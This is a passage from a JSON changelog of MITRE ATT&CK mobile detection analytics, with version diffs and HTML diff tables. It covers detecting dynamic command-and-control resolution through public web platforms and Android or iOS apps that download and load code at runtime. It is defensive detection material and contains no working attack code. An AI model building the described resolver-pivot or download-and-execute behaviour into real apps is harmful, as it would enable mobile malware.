                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Maximum allowed time between resolver retrieval and pivot connection (e.g., 5\\u201360 seconds).\"}, {\"field\": \"NewDomainThreshold\", \"description\": \"Defines what qualifies as a previously unseen or rare destination for the app or device.\"}, {\"field\": \"AllowedServiceToDestinationMapping\", \"description\": \"Legitimate mappings between apps and expected downstream services.\"}, {\"field\": \"UserInteractionThreshold\", \"description\": \"Defines acceptable delay between user interaction and network activity.\"}, {\"field\": \"PayloadSizeThreshold\", \"description\": \"Small resolver responses followed by larger pivot traffic can indicate extraction behavior.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-17 20:48:31.295000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"The defender correlates an app-attributed request to a legitimate public web platform with a subsequent outbound connection to a newly derived or previously unseen destination within a short time window. The behavior is strengthened when the initial request retrieves structured or encoded content followed by a pivot to a different domain or IP that was not previously contacted by the app, especially when occurring without user interaction, in background state, or immediately after app initialization or scheduled execution. This sequence reflects resolver retrieval followed by dynamic C2 resolution.\", \"old_value\": \"Many properly configured firewalls may naturally block command and control traffic.\\nApplication vetting services may provide a list of connections made or received by an application, or a list of domains contacted by the application. \", \"diff\": \"--- \\n+++ \\n@@ -1,2 +1 @@\\n-Many properly configured firewalls may naturally block command and control traffic.\\n-Application vetting services may provide a list of connections made or received by an application, or a list of domains contacted by the application. \\n+The defender correlates an app-attributed request to a legitimate public web platform with a subsequent outbound connection to a newly derived or previously unseen destination within a short time window. The behavior is strengthened when the initial request retrieves structured or encoded content followed by a pivot to a different domain or IP that was not previously contacted by the app, especially when occurring without user interaction, in background state, or immediately after app initialization or scheduled execution. This sequence reflects resolver retrieval followed by dynamic C2 resolution.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c\", \"name\": \"VPN:MobileProxy\", \"channel\": \"App-attributed HTTP GET or HTTPS session to public web platform (social, paste, collaboration, cloud storage, code-hosting) returned content followed by outbound connection to a different domain or IP within TimeWindow\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba\", \"name\": \"Network Traffic\", \"channel\": \"None\"}}, \"root['x_mitre_log_source_references'][1]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c\", \"name\": \"VPN:MobileProxy\", \"channel\": \"DNS query or TLS SNI for previously unseen domain occurred within TimeWindow after session to legitimate web-service domain from same app identity\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--764ee29e-48d6-4934-8e6b-7a606aaaafc0\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c\", \"name\": \"VPN:MobileProxy\", \"channel\": \"Initial session to public web-service domain transferred small response payload followed by connection to new external endpoint with different ASN or domain category\"}, \"root['x_mitre_log_source_references'][3]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"AppState=background or foreground_service active when resolver retrieval request occurred and pivot connection followed without foreground transition\"}, \"root['x_mitre_log_source_references'][4]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"LastUserInteractionDelta exceeded threshold before resolver retrieval and subsequent pivot connection sequence\"}, \"root['x_mitre_log_source_references'][5]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Background work scheduler, job execution, or persistent service triggered network request to public web-service followed by second outbound connection within TimeWindow\"}, \"root['x_mitre_log_source_references'][6]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"android:MDMLog\", \"channel\": \"App initiating resolver\\u2192pivot sequence was unmanaged or not authorized to communicate with detected web-service class or external infrastructure\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to197__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to197__0\"><a href=\"#difflib_chg_to197__top\">t</a></td><td class=\"diff_header\" id=\"from197_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Many&nbsp;properly&nbsp;configured&nbsp;firewalls&nbsp;may&nbsp;naturally&nbsp;block&nbsp;comma</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to197__top\">t</a></td><td class=\"diff_header\" id=\"to197_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">The&nbsp;defender&nbsp;correlates&nbsp;an&nbsp;app-attributed&nbsp;request&nbsp;to&nbsp;a&nbsp;legit</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">nd&nbsp;and&nbsp;control&nbsp;traffic.&nbsp;Application&nbsp;vetting&nbsp;services&nbsp;may&nbsp;pro</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">imate&nbsp;public&nbsp;web&nbsp;platform&nbsp;with&nbsp;a&nbsp;subsequent&nbsp;outbound&nbsp;connect</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">vide&nbsp;a&nbsp;list&nbsp;of&nbsp;connections&nbsp;made&nbsp;or&nbsp;received&nbsp;by&nbsp;an&nbsp;applicatio</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ion&nbsp;to&nbsp;a&nbsp;newly&nbsp;derived&nbsp;or&nbsp;previously&nbsp;unseen&nbsp;destination&nbsp;with</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">n,&nbsp;or&nbsp;a&nbsp;list&nbsp;of&nbsp;domains&nbsp;contacted&nbsp;by&nbsp;the&nbsp;application.&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">in&nbsp;a&nbsp;short&nbsp;time&nbsp;window.&nbsp;The&nbsp;behavior&nbsp;is&nbsp;strengthened&nbsp;when&nbsp;th</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">e&nbsp;initial&nbsp;request&nbsp;retrieves&nbsp;structured&nbsp;or&nbsp;encoded&nbsp;content&nbsp;fo</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">llowed&nbsp;by&nbsp;a&nbsp;pivot&nbsp;to&nbsp;a&nbsp;different&nbsp;domain&nbsp;or&nbsp;IP&nbsp;that&nbsp;was&nbsp;not&nbsp;p</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">reviously&nbsp;contacted&nbsp;by&nbsp;the&nbsp;app,&nbsp;especially&nbsp;when&nbsp;occurring&nbsp;wi</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">thout&nbsp;user&nbsp;interaction,&nbsp;in&nbsp;background&nbsp;state,&nbsp;or&nbsp;immediately&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">after&nbsp;app&nbsp;initialization&nbsp;or&nbsp;scheduled&nbsp;execution.&nbsp;This&nbsp;sequen</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ce&nbsp;reflects&nbsp;resolver&nbsp;retrieval&nbsp;followed&nbsp;by&nbsp;dynamic&nbsp;C2&nbsp;resolu</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">tion.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--acc1bb20-bd46-4228-abba-f4befe82e926",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-03-17 20:56:49.928000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0617#AN1676",
                            "external_id": "AN1676"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1676",
                    "description": "The defender correlates a supervised-device or managed-app request to a legitimate web platform with a subsequent connection to a newly derived destination that is not part of the expected service interaction. Because iOS has weaker app-level telemetry, the strongest signal is a network-level sequence where a request to a known public platform is immediately followed by a connection to a different domain or IP, particularly when the device is locked, no recent user interaction occurred, and the bundle is not expected to interact with such downstream infrastructure.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "VPN:MobileProxy",
                            "channel": "App-attributed HTTP GET or HTTPS session to public web platform (social, paste, collaboration, cloud storage, code-hosting) returned content followed by outbound connection to a different domain or IP within TimeWindow"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "VPN:MobileProxy",
                            "channel": "DNS query or TLS SNI for previously unseen domain occurred within TimeWindow after session to legitimate web-service domain from same app identity"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
                            "name": "MobileEDR:telemetry",
                            "channel": "DeviceLockState=locked or BackgroundRefresh active during resolver\u2192pivot sequence"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
                            "name": "MobileEDR:telemetry",
                            "channel": "LastUserInteractionDelta exceeded threshold before resolver request and pivot connection sequence"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "iOS:MDMLog",
                            "channel": "Bundle performing resolver\u2192pivot sequence not present in approved managed-app baseline or lacks expected service relationship"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "iOS:unifiedlog",
                            "channel": "Background task or networking subsystem event occurred immediately before resolver retrieval and pivot connection sequence"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Maximum allowed time between resolver retrieval and pivot connection."
                        },
                        {
                            "field": "NewDomainThreshold",
                            "description": "Defines rarity or novelty of domain for the device or bundle."
                        },
                        {
                            "field": "AllowedServiceToDestinationMapping",
                            "description": "Expected relationships between apps and external services."
                        },
                        {
                            "field": "BackgroundRefreshBaseline",
                            "description": "Expected background network behavior for managed apps."
                        },
                        {
                            "field": "UserInteractionThreshold",
                            "description": "Defines acceptable timing between user activity and network requests."
                        }
                    ],
                    "x_mitre_platforms": [
                        "iOS"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Maximum allowed time between resolver retrieval and pivot connection.\"}, {\"field\": \"NewDomainThreshold\", \"description\": \"Defines rarity or novelty of domain for the device or bundle.\"}, {\"field\": \"AllowedServiceToDestinationMapping\", \"description\": \"Expected relationships between apps and external services.\"}, {\"field\": \"BackgroundRefreshBaseline\", \"description\": \"Expected background network behavior for managed apps.\"}, {\"field\": \"UserInteractionThreshold\", \"description\": \"Defines acceptable timing between user activity and network requests.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-17 20:56:49.928000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"The defender correlates a supervised-device or managed-app request to a legitimate web platform with a subsequent connection to a newly derived destination that is not part of the expected service interaction. Because iOS has weaker app-level telemetry, the strongest signal is a network-level sequence where a request to a known public platform is immediately followed by a connection to a different domain or IP, particularly when the device is locked, no recent user interaction occurred, and the bundle is not expected to interact with such downstream infrastructure.\", \"old_value\": \"Many properly configured firewalls may naturally block command and control traffic.\\nApplication vetting services may provide a list of connections made or received by an application, or a list of domains contacted by the application. \", \"diff\": \"--- \\n+++ \\n@@ -1,2 +1 @@\\n-Many properly configured firewalls may naturally block command and control traffic.\\n-Application vetting services may provide a list of connections made or received by an application, or a list of domains contacted by the application. \\n+The defender correlates a supervised-device or managed-app request to a legitimate web platform with a subsequent connection to a newly derived destination that is not part of the expected service interaction. Because iOS has weaker app-level telemetry, the strongest signal is a network-level sequence where a request to a known public platform is immediately followed by a connection to a different domain or IP, particularly when the device is locked, no recent user interaction occurred, and the bundle is not expected to interact with such downstream infrastructure.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c\", \"name\": \"VPN:MobileProxy\", \"channel\": \"App-attributed HTTP GET or HTTPS session to public web platform (social, paste, collaboration, cloud storage, code-hosting) returned content followed by outbound connection to a different domain or IP within TimeWindow\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba\", \"name\": \"Network Traffic\", \"channel\": \"None\"}}, \"root['x_mitre_log_source_references'][1]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c\", \"name\": \"VPN:MobileProxy\", \"channel\": \"DNS query or TLS SNI for previously unseen domain occurred within TimeWindow after session to legitimate web-service domain from same app identity\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--764ee29e-48d6-4934-8e6b-7a606aaaafc0\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"DeviceLockState=locked or BackgroundRefresh active during resolver\\u2192pivot sequence\"}, \"root['x_mitre_log_source_references'][3]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"LastUserInteractionDelta exceeded threshold before resolver request and pivot connection sequence\"}, \"root['x_mitre_log_source_references'][4]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"iOS:MDMLog\", \"channel\": \"Bundle performing resolver\\u2192pivot sequence not present in approved managed-app baseline or lacks expected service relationship\"}, \"root['x_mitre_log_source_references'][5]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"iOS:unifiedlog\", \"channel\": \"Background task or networking subsystem event occurred immediately before resolver retrieval and pivot connection sequence\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to101__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to101__0\"><a href=\"#difflib_chg_to101__top\">t</a></td><td class=\"diff_header\" id=\"from101_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Many&nbsp;properly&nbsp;configured&nbsp;firewalls&nbsp;may&nbsp;naturally&nbsp;block&nbsp;comma</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to101__top\">t</a></td><td class=\"diff_header\" id=\"to101_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">The&nbsp;defender&nbsp;correlates&nbsp;a&nbsp;supervised-device&nbsp;or&nbsp;managed-app&nbsp;r</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">nd&nbsp;and&nbsp;control&nbsp;traffic.&nbsp;Application&nbsp;vetting&nbsp;services&nbsp;may&nbsp;pro</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">equest&nbsp;to&nbsp;a&nbsp;legitimate&nbsp;web&nbsp;platform&nbsp;with&nbsp;a&nbsp;subsequent&nbsp;connec</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">vide&nbsp;a&nbsp;list&nbsp;of&nbsp;connections&nbsp;made&nbsp;or&nbsp;received&nbsp;by&nbsp;an&nbsp;applicatio</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">tion&nbsp;to&nbsp;a&nbsp;newly&nbsp;derived&nbsp;destination&nbsp;that&nbsp;is&nbsp;not&nbsp;part&nbsp;of&nbsp;the&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">n,&nbsp;or&nbsp;a&nbsp;list&nbsp;of&nbsp;domains&nbsp;contacted&nbsp;by&nbsp;the&nbsp;application.&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">expected&nbsp;service&nbsp;interaction.&nbsp;Because&nbsp;iOS&nbsp;has&nbsp;weaker&nbsp;app-lev</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">el&nbsp;telemetry,&nbsp;the&nbsp;strongest&nbsp;signal&nbsp;is&nbsp;a&nbsp;network-level&nbsp;sequen</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ce&nbsp;where&nbsp;a&nbsp;request&nbsp;to&nbsp;a&nbsp;known&nbsp;public&nbsp;platform&nbsp;is&nbsp;immediately</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;followed&nbsp;by&nbsp;a&nbsp;connection&nbsp;to&nbsp;a&nbsp;different&nbsp;domain&nbsp;or&nbsp;IP,&nbsp;parti</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">cularly&nbsp;when&nbsp;the&nbsp;device&nbsp;is&nbsp;locked,&nbsp;no&nbsp;recent&nbsp;user&nbsp;interactio</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">n&nbsp;occurred,&nbsp;and&nbsp;the&nbsp;bundle&nbsp;is&nbsp;not&nbsp;expected&nbsp;to&nbsp;interact&nbsp;with&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">such&nbsp;downstream&nbsp;infrastructure.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--7b4c77fd-f350-48ec-abce-aac3e35c939f",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-01-29 17:21:52.654000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0618#AN1677",
                            "external_id": "AN1677"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1677",
                    "description": "From the defender\u2019s view: an app retrieves opaque code (DEX/SO/JAR/JS) over the network or IPC, writes it into an app-writable path, optionally performs verification-bypass behaviors (reflection, addJavascriptInterface exposure, or execmem friction), and then loads/executes that code via DexClassLoader/PathClassLoader, dlopen, or WebView bridge invocation within a short window. The analytic correlates Network Content \u2192 File Creation/Modification \u2192 OS API Execution (loader/syscall/SELinux friction) \u2192 Module Load (DexClassLoader/dlopen) and, for WebView paths, Application Log signals of JavaScript interface attachment.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "NSM:Flow",
                            "channel": "HTTP(S)/QUIC download of executable/opaque content (application/octet-stream, application/zip, application/java-archive, application/x-dex, application/x-sharedlib, text/javascript)"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
                            "name": "android:logcat",
                            "channel": "Create/write under /data/data/<pkg>/(files|cache)/ or /storage/emulated/0/ with extension .dex/.jar/.so/.zip/.tmp/.js and elevated entropy"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "android:logcat",
                            "channel": "SELinux AVC for execmem/execute_no_trans/mprotect following recent writes by same UID"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--c0a4a086-cc20-4e1e-b7cb-29d99dfa3fb1",
                            "name": "android:logcat",
                            "channel": "DexClassLoader|PathClassLoader load from app-writable path OR dlopen of a freshly created .so"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindowSeconds",
                            "description": "Max correlation window between download \u2192 write \u2192 load (e.g., 10\u201360s depending on device/workload)."
                        },
                        {
                            "field": "ContentTypeList",
                            "description": "List of MIME types considered \u2018code-like\u2019 (octet-stream, zip, java-archive, x-dex, x-sharedlib, javascript)."
                        },
                        {
                            "field": "WritablePathRegex",
                            "description": "Regex for app-writable destinations to watch (/data/data/<pkg>/(files|cache)/, /storage/emulated/0/...)."
                        },
                        {
                            "field": "PayloadEntropyThreshold",
                            "description": "Entropy cutoff to flag likely code blobs (e.g., \u2265 7.2)."
                        },
                        {
                            "field": "KnownGoodCDNAllowlist",
                            "description": "CDNs/domains expected for legitimate updates to reduce FPs."
                        },
                        {
                            "field": "KnownGoodLoaderAllowlist",
                            "description": "Bundles/libs known to legitimately load from writable paths (dev/test apps)."
                        },
                        {
                            "field": "JSInterfaceNameList",
                            "description": "Names of allowed WebView JS interfaces for the org (e.g., analytics only)."
                        },
                        {
                            "field": "UserContext",
                            "description": "Foreground/background, Work Profile, dev mode to scope alerts."
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindowSeconds\", \"description\": \"Max correlation window between download \\u2192 write \\u2192 load (e.g., 10\\u201360s depending on device/workload).\"}, {\"field\": \"ContentTypeList\", \"description\": \"List of MIME types considered \\u2018code-like\\u2019 (octet-stream, zip, java-archive, x-dex, x-sharedlib, javascript).\"}, {\"field\": \"WritablePathRegex\", \"description\": \"Regex for app-writable destinations to watch (/data/data/<pkg>/(files|cache)/, /storage/emulated/0/...).\"}, {\"field\": \"PayloadEntropyThreshold\", \"description\": \"Entropy cutoff to flag likely code blobs (e.g., \\u2265 7.2).\"}, {\"field\": \"KnownGoodCDNAllowlist\", \"description\": \"CDNs/domains expected for legitimate updates to reduce FPs.\"}, {\"field\": \"KnownGoodLoaderAllowlist\", \"description\": \"Bundles/libs known to legitimately load from writable paths (dev/test apps).\"}, {\"field\": \"JSInterfaceNameList\", \"description\": \"Names of allowed WebView JS interfaces for the org (e.g., analytics only).\"}, {\"field\": \"UserContext\", \"description\": \"Foreground/background, Work Profile, dev mode to scope alerts.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-01-29 17:21:52.654000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"From the defender\\u2019s view: an app retrieves opaque code (DEX/SO/JAR/JS) over the network or IPC, writes it into an app-writable path, optionally performs verification-bypass behaviors (reflection, addJavascriptInterface exposure, or execmem friction), and then loads/executes that code via DexClassLoader/PathClassLoader, dlopen, or WebView bridge invocation within a short window. The analytic correlates Network Content \\u2192 File Creation/Modification \\u2192 OS API Execution (loader/syscall/SELinux friction) \\u2192 Module Load (DexClassLoader/dlopen) and, for WebView paths, Application Log signals of JavaScript interface attachment.\", \"old_value\": \"Application vetting services may be able to list domains and/or IP addresses that applications communicate with. \\nMobile security products may provide URL inspection services that could determine if a domain being visited is malicious.\\nApplication vetting services could look for indications that the application downloads and executes new code at runtime (e.g., on Android, use of `DexClassLoader`, `System.load`, or the WebView `JavaScriptInterface` capability; on iOS, use of JSPatch or similar capabilities).\", \"diff\": \"--- \\n+++ \\n@@ -1,3 +1 @@\\n-Application vetting services may be able to list domains and/or IP addresses that applications communicate with. \\n-Mobile security products may provide URL inspection services that could determine if a domain being visited is malicious.\\n-Application vetting services could look for indications that the application downloads and executes new code at runtime (e.g., on Android, use of `DexClassLoader`, `System.load`, or the WebView `JavaScriptInterface` capability; on iOS, use of JSPatch or similar capabilities).\\n+From the defender\\u2019s view: an app retrieves opaque code (DEX/SO/JAR/JS) over the network or IPC, writes it into an app-writable path, optionally performs verification-bypass behaviors (reflection, addJavascriptInterface exposure, or execmem friction), and then loads/executes that code via DexClassLoader/PathClassLoader, dlopen, or WebView bridge invocation within a short window. The analytic correlates Network Content \\u2192 File Creation/Modification \\u2192 OS API Execution (loader/syscall/SELinux friction) \\u2192 Module Load (DexClassLoader/dlopen) and, for WebView paths, Application Log signals of JavaScript interface attachment.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": 